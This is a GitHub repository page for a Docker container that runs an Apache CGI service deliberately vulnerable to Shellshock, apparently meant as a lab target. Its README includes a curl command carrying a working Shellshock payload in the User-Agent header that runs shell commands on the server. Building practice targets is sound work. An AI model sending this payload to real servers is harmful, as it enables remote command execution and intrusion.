Skip to content

Zenithar/docker-shellshockable

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 

Repository files navigation

docker-shellshockable

Docker container with Apache 2 / CGI shellshock vulnerable.

#> docker run -d --name shellshock zenithar/shellshockable
#> docker ps
#> export WEBSRV=`docker inspect --format "{{.NetworkSettings.IPAddress}}" shellshock`
#> curl http://$WEBSRV/cgi-bin/shockme.cgi
#> curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://$WEBSRV/cgi-bin/shockme.cgi

About

Docker container with Apache 2 / CGI shellshock vulnerable.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages